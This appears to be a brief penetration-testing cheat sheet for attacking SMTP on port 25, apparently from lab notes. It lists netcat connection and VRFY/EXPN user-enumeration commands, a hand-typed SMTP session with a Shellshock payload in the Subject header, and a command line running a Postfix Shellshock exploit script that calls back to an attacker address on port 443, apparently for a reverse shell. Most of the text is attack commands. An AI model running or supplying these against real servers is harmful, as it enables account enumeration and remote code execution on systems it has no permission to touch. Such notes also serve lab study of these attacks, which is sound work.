SMTP 25
Connection
nc -C {ip} 25
Basic commands
VRFY {user} - Check user existence
EXPN {user} - Check if the user belongs to a mailing listMail sending
mail
mail from:<whatever>
rcpt to:<[email protected]>
data
To: <'[email protected]'>
From: <'[email protected]'>
Subject:() { :; };cmd
.
quitMay find a valid email from SMB share /home/ and ls
Postfix Shellshock (need valid rcpt to email address)
python2 ./postfix-shellshock-nc.py 10.11.1.231 [email protected] 192.168.119.179 443Last updated